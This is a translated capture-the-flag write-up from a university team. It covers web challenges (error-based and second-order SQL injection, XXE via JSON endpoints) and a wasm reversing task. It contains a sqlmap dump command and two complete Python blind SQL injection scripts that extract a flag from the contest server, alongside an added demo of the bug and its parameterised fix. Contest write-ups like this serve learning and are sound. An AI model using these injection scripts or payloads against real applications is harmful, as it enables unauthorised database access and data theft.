SJTU Operations Contest - Shenzhen University Writeup

Original source: Dazhuanlan https://www.dazhuanlan.com/2019/08/22/5d5e9b211840a/

[screenshot]

Right after getting the challenge, a crowd of people were going for XSS, so I followed along and tried XSS too.
[screenshot]
The cookies we captured were all useless, but the login endpoint returned a database error.
[screenshot]
So we tried error-based injection.

The final payload:
[screenshot]
[screenshot]

After the contest, we ran it through sqlmap (the saved request is in 1.txt; the option is `--threads`, which the original had as `--thread`):

```bash
python sqlmap.py -r C:1.txt --threads 10 -D bbs -T flag -C flag --dump
```

[screenshot]

EIS{7879f0a27d8bcfcff0bcc837d7641e81}

SimpleExtensionExplorerInjection

[screenshot]

The challenge mentioned XXE and the flag file and gave us the source, but the request the challenge submits is actually in JSON format.

Reference: https://blog.netspi.com/playing-content-type-xxe-json-endpoints/

[screenshot]

Following the article, we constructed the exploit:

[screenshot]

SimplePrintEventLogger

I don't know what the challenge author wanted us to do with this one; combined with the XXE from the previous challenge, it gives arbitrary file read.
Reference: http://drops.xmd5.com/static/drops/tips-5290.html

[screenshot]
[screenshot]

SimpleServerInjection

[screenshot]

[screenshot]

[screenshot]

Just follow: https://www.secpulse.com/archives/66934.html
[screenshot]

SimpleBlog

This was probably the most exciting web challenge of the whole contest; there is one more I'll rant about in a moment.


At first we kept fiddling with the id parameter, trying to work out how to do a second-order injection.

Then, when submitting answers to the Final Exam, we noticed that the same answers got a random score.

Not until 4 pm did we realise that the username given at registration is reused at the scoring step, where we guessed the backend does a lookup like

```sql
where username='xxxxxx'
```

Then, when registering, we found

[screenshot]
[screenshot]

Registering

```sql
Decade' or if(1,1,pow(6,666666))#
```

[screenshot]
Registering

```sql
Decade' or if(0,1,pow(6,666666))#
```

[screenshot]

Only then did we realise that this is how the "0 points" mentioned in the challenge comes about: when the if() condition is false, pow() overflows, the score query fails, and the page reports a score of 0.

Straight to the script:

```python
# Script 1: the registered username carries if(<cond>, 1, pow(6, 666666666666)).
# When <cond> is false, pow() overflows, the score query errors out and the page
# shows "Your grades is 0"; when it is true the query succeeds. One character of
# the flag is confirmed per round.
import requests

REGISTER_URL = "http://210.32.4.20/register.php"
LOGIN_URL = "http://210.32.4.20/login.php"
ANSWER_URL = "http://210.32.4.20/answer.php"


def main():
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{}?!:@#$%&()[],. '
    result = ''

    for i in range(1, 50):
        for c in chars:
            j = ord(c)
            username = """decade'or if((ascii(substr((select flag from flag),%s,1))=%s), 1, pow(6,666666666666))#""" % (i, j)
            data = {'username': username, 'password': 'aaa'}
            print(username)
            # retry until the registration request gets through
            while True:
                try:
                    r = requests.post(REGISTER_URL, data=data)
                    if r.status_code == 200:
                        break
                except Exception as e:
                    print(str(e))
            html = login_and_answer(username)
            # a normal score means the condition held, so this is the right character
            if 'Your grades is 0' not in html:
                result += chr(j)
                print(result)
                break


def login_and_answer(username):
    data = {'username': username, 'password': 'aaa'}
    # log in as the freshly registered user and submit one answer; retry on failure
    while True:
        try:
            s = requests.Session()
            r1 = s.post(LOGIN_URL, data=data)
            r2 = s.post(ANSWER_URL, data={'10.a': 'on'})
            if r1.status_code == 200 and r2.status_code == 200:
                return r2.text
        except Exception as e:
            print(str(e))


if __name__ == "__main__":
    main()
```
```python
# Script 2: same idea with the branches swapped. exp(~(...)) overflows when the
# condition holds, so the "Your grades is 0" alert now marks the correct character.
import requests
import string

register_url = "http://210.32.4.20/register.php"
login_url = "http://210.32.4.20/login.php"
answer_url = "http://210.32.4.20/answer.php"

guess = "}{_" + string.digits + string.ascii_letters + "!@#$"


# payload = "1' and if((ascii(substr((select flag from flag limit 0,1),1,1))={}),exp(~(select * from(select user())a)),1)#"


flag = ""
for i in range(1, 50):
    print("round: " + str(i))
    for j in guess:
        print("[+]testing: " + j)
        tmp = ord(j)
        payload = "1' and if((ascii(substr((select flag from flag),{},1))={}),exp(~(select * from(select user())a)),1)#"
        print(payload.format(i, tmp))
        data1 = {
            "username": payload.format(i, tmp),
            "password": "aaa"
        }
        data2 = {
            "9.d": "on"
        }
        # one session per attempt (the original named this `re`, shadowing the re module)
        s = requests.session()
        s.post(register_url, data=data1)
        s.post(login_url, data=data1)
        res = s.post(answer_url, data2)
        if "<script>alert('Your grades is 0');</script>" in res.text:
            flag = flag + j
            break
print("flag: " + flag)
```
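The scoring lookup guessed above (`where username='xxxxxx'` assembled from the stored username) is a second-order injection: the payload is stored harmlessly at registration and only becomes SQL when the answer page reuses it. The following is an added example, not code from the writeup or the challenge, that reproduces the bug and its fix against an in-memory sqlite3 database. The table layout, the sample rows, and the sqlite-flavoured `' or 1=1 --` username are constructed (sqlite has no MySQL `if()`/`pow()` overflow and comments with `--` rather than `#`); the challenge's real backend was MySQL.

```python
import sqlite3

# Constructed stand-in for the challenge's user/score table (assumption: the real
# backend is MySQL; sqlite3 is used here only so the example runs offline).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, grade INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [("alice", 95), ("bob", 60)])
    return db


def register(db, username, grade=0):
    # Registration stores the username with a bound parameter, so nothing breaks here.
    # That is exactly what makes the bug second-order: the stored value only becomes
    # dangerous when a later query re-embeds it as SQL text.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, grade))


def grade_vulnerable(db, username):
    # The lookup the writeup guessed: where username='xxxxxx' built by string formatting.
    sql = "SELECT grade FROM users WHERE username='%s'" % username
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        # A failing query is what the challenge surfaced as "Your grades is 0".
        return 0
    return row[0] if row else 0


def grade_fixed(db, username):
    # Same lookup with a bound parameter: the stored username is data, never SQL.
    row = db.execute("SELECT grade FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else 0


def demo():
    """Register a crafted username, then score it through both lookups."""
    db = make_db()
    # Constructed sqlite equivalent of the writeup's "Decade' or ...#" usernames.
    injected = "Decade' or 1=1 --"
    register(db, injected)
    return grade_vulnerable(db, injected), grade_fixed(db, injected)


if __name__ == "__main__":
    print(demo())  # -> (95, 0)
```

`grade_vulnerable()` hands back another user's score for the crafted name (the `or 1=1` turns the lookup into "any row") and returns 0 when the reused name breaks the query, which is the signal both scripts above key on; `grade_fixed()` looks up the identical stored string as a plain value and finds only its own row.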

[screenshot]

SimpleWasmReverse

[screenshot]

This one is obviously a reversing challenge, and as a web guy I know nothing about that. We got a flag.wasm file, and because our reverser was careless it went unsolved on site; after the contest pizza had a look and solved it in seconds. Here is the writeup (runs away).
After getting the wasm, convert it to a C file with the wasm2c tool, compile that to a .o with gcc, and open it in IDA.

In the function list we find the suspicious function check(); a bit of analysis reveals function f52, which is a base64 encoding routine. Combined with the suspicious string aW9kan40NGgzOTNkNWZoNDtlOjloNmk1OThmNzk4O2dkPDRoZoA= in the strings list, it is clearly a base64-encoded string. Decoding it gives iodj~44h393d5fh4;e:9h6i598f798;gd<4hf€ (the trailing character is the byte 0x80). Looking further into check(), we find the following code:

```c
while ( v14 != 38 )
{
    v4 = v14++;
    v5 = i32_load8_s(Z_envZ_memory, v4 + a1);
    f797(v21, (unsigned __int8)(v5 + 3));
}
```

As you can see, 3 is added to each byte, so after base64-decoding we just subtract 3 again:

```python
import base64

a = 'aW9kan40NGgzOTNkNWZoNDtlOjloNmk1OThmNzk4O2dkPDRoZoA='
s = ''
# base64-decode, then undo the +3 applied to every byte in check()
for b in base64.b64decode(a):
    s += chr(b - 3)
print(s)
```

This gives the flag.
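The loop above (bound 38, +3 on every byte) together with the base64 string from the binary fully determines the transform, so it can be reimplemented in both directions and checked. The following is an added example, not the writeup's or the challenge's code: it recovers the shifted bytes (the 38 bytes the loop bound refers to), reverses the +3 modulo 256, and sanity-checks that the result has the `flag{<hex>}` shape. Working on bytes rather than text is deliberate, because the last shifted byte is 0x80 (rendered as € on the page), which is not valid text on its own; the `flag{...}` shape check is an assumption about the challenge's flag format.

```python
import base64

# Shift seen in the decompiled loop: f797(v21, (unsigned __int8)(v5 + 3))
SHIFT = 3

# The base64 string pulled from the binary's string list on the page.
PAGE_STRING = "aW9kan40NGgzOTNkNWZoNDtlOjloNmk1OThmNzk4O2dkPDRoZoA="


def shifted_bytes(encoded: str) -> bytes:
    """The intermediate the page shows as iodj~44h393d5fh4;...€: plain base64 decoding."""
    return base64.b64decode(encoded)


def encode_check(data: bytes) -> str:
    """Forward direction as inferred from check(): +3 on each byte (mod 256), then base64."""
    return base64.b64encode(bytes((b + SHIFT) & 0xFF for b in data)).decode("ascii")


def decode_check(encoded: str) -> bytes:
    """Inverse: base64-decode, then shift each byte back by 3 (mod 256)."""
    return bytes((b - SHIFT) & 0xFF for b in shifted_bytes(encoded))


def looks_like_flag(data: bytes) -> bool:
    """Assumed flag format: flag{<lowercase hex>} with nothing left unprintable."""
    return (data.startswith(b"flag{") and data.endswith(b"}")
            and all(c in b"0123456789abcdef" for c in data[5:-1]))


if __name__ == "__main__":
    recovered = decode_check(PAGE_STRING)
    print(len(recovered), looks_like_flag(recovered))
    print(recovered.decode("ascii"))
```

Round-tripping with `encode_check(decode_check(PAGE_STRING))` reproduces the string from the binary exactly, which confirms that the +3-then-base64 reading of check() is complete and that no other step was missed.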

Summary

[screenshot]

Keep it up for the next contest! Go Shenzhen University!


Reposted from www.cnblogs.com/petewell/p/11417858.html